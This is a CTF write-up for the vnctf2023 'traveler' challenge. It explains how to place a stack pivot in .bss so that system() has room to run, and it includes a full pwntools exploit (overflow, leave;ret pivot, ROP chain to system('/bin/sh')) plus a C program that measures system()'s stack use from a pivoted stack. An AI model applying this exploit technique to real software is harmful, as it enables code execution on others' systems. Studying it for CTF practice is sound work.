On the system function

[TOC]

  • I recently worked on the traveler challenge from vnctf2023. I saw at a glance that it was a stack pivot, and the challenge also provides a system function, but I was still stuck for a long time.
  • The catch: as soon as system is entered it sets up its own stack frame, so rsp is decremented and the frame (plus the frames of everything system calls) grows downward from the pivot point. If the fake stack sits right at the start of .bss, that growth immediately runs into the non-writable parts of the ELF below it, such as the GOT, and the process faults before the shell ever spawns. The fix is simply to raise the fake stack high enough that system has writable memory beneath it; here the pivot goes 0xd00 bytes above the start of .bss at 0x4040A0.
  • Exploit
```python
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
p = process("/home/zp9080/PWN/traveler")

def dbg():
    gdb.attach(p, 'b *0x40124E')

system_addr = 0x4011EC      # system, as provided by the binary
pop_rdi = 0x4012c3          # pop rdi ; ret
leave_ret = 0x401253        # leave ; ret
ret = 0x40101a              # ret, keeps rsp 16-byte aligned when system is entered
bss = 0x4040A0 + 0xd00      # fake stack, placed well above the start of .bss so
                            # system's frames stay inside writable memory
flag = 0x4040A0             # global buffer that receives the second input

prompt = b"How many travels can a person have in his life?\n"

# Stage 1: overflow the 0x20-byte buffer, point the saved rbp at the fake
# stack and return into the function so the next read lands on it.
payload = b'a' * 0x20 + p64(bss + 0x20) + p64(0x401216)
p.send(payload)
p.sendafter(prompt, b'/bin/sh\x00')   # "/bin/sh" ends up in the global at 0x4040A0

# Stage 2: ROP chain written to the fake stack, followed by a fake saved rbp
# and leave;ret, so the function epilogue pivots rsp onto the chain.
payload = p64(pop_rdi) + p64(flag) + p64(ret) + p64(system_addr) + p64(bss - 8) + p64(leave_ret)
p.send(payload)
p.sendafter(prompt, b'/bin/sh\x00')
p.interactive()
```
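To see concretely why the pivot point matters, here is an added example that is not code from the writeup or from the challenge: a C program that runs system() from a fake stack in its own .bss, exactly the situation the pivoted exploit creates, and measures how far below the pivoted rsp the call actually reached. It then applies that number to the two candidate pivot addresses from the writeup. The start of the writable segment, 0x404000, is an assumption made here for illustration (the page containing the 0x4040A0 global), not a value read from the traveler binary.

```c
/* Added example (not from the writeup): measure how much stack system() really
 * consumes by calling it from a fake stack placed in our own .bss, the same
 * situation a stack pivot into .bss creates. x86-64 Linux, GCC or clang. */
#if !defined(__x86_64__)
#error "this example pivots rsp with x86-64 inline assembly"
#endif
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FAKE_STACK_SIZE (256 * 1024)
#define FILL_BYTE 0xAA

/* Fake stack in .bss; its top must be 16-byte aligned at the call. */
static unsigned char fake_stack[FAKE_STACK_SIZE] __attribute__((aligned(16)));

/* Run system(cmd) with rsp pointing at the top of fake_stack, then report how
 * many bytes below that top system (and everything it called) touched. */
size_t measure_system_stack_usage(const char *cmd)
{
    memset(fake_stack, FILL_BYTE, sizeof fake_stack);
    uintptr_t top = (uintptr_t)fake_stack + FAKE_STACK_SIZE;
    int (*fn)(const char *) = system;
    const char *arg = cmd;   /* goes in rdi; rdi is clobbered by the call */

    __asm__ __volatile__(
        "mov %%rsp, %%rbx\n\t"   /* keep the real rsp in a callee-saved register */
        "mov %[top], %%rsp\n\t"  /* pivot onto the fake stack */
        "call *%[fn]\n\t"        /* system(cmd) builds its frames downward from top */
        "mov %%rbx, %%rsp\n\t"   /* back to the real stack */
        : "+D"(arg)
        : [top] "r"(top), [fn] "r"(fn)
        : "rbx", "rax", "rcx", "rdx", "rsi", "r8", "r9", "r10", "r11",
          "xmm0", "xmm1", "xmm2", "xmm3", "xmm4", "xmm5", "xmm6", "xmm7",
          "xmm8", "xmm9", "xmm10", "xmm11", "xmm12", "xmm13", "xmm14", "xmm15",
          "memory", "cc");

    /* The first byte from the bottom that no longer carries the fill pattern
     * marks the deepest point the pivoted stack reached. */
    size_t lowest = 0;
    while (lowest < FAKE_STACK_SIZE && fake_stack[lowest] == FILL_BYTE)
        lowest++;
    return FAKE_STACK_SIZE - lowest;
}

/* Does a pivot to pivot_rsp leave `needed` bytes of writable memory below it?
 * writable_start is the lowest writable address underneath the fake stack. */
int pivot_has_headroom(uintptr_t pivot_rsp, uintptr_t writable_start, size_t needed)
{
    return pivot_rsp >= writable_start && pivot_rsp - writable_start >= needed;
}

int main(void)
{
    size_t used = measure_system_stack_usage("true");
    printf("system(\"true\") used %zu bytes below the pivoted rsp\n", used);

    /* Pivot addresses are the writeup's; rw_start = 0x404000 is an assumption
     * (the page holding the 0x4040A0 global), not read from the challenge. */
    uintptr_t rw_start = 0x404000;
    uintptr_t low_pivot = 0x4040A0;
    uintptr_t high_pivot = 0x4040A0 + 0xd00;
    printf("pivot at 0x%lx: %s\n", (unsigned long)low_pivot,
           pivot_has_headroom(low_pivot, rw_start, used) ? "enough room" : "runs below the RW segment");
    printf("pivot at 0x%lx: %s\n", (unsigned long)high_pivot,
           pivot_has_headroom(high_pivot, rw_start, used) ? "enough room" : "runs below the RW segment");
    return 0;
}
```

Build it with gcc on x86-64 Linux and read off the byte count: that is roughly what has to fit between your pivot address and the start of the writable segment (check it with `readelf -lW` on the binary or `vmmap` in gdb) before a fake stack in .bss can be trusted. Below .bss lie the GOT and other pages that are not writable at runtime, which is exactly what the faulting pivot in the writeup ran into.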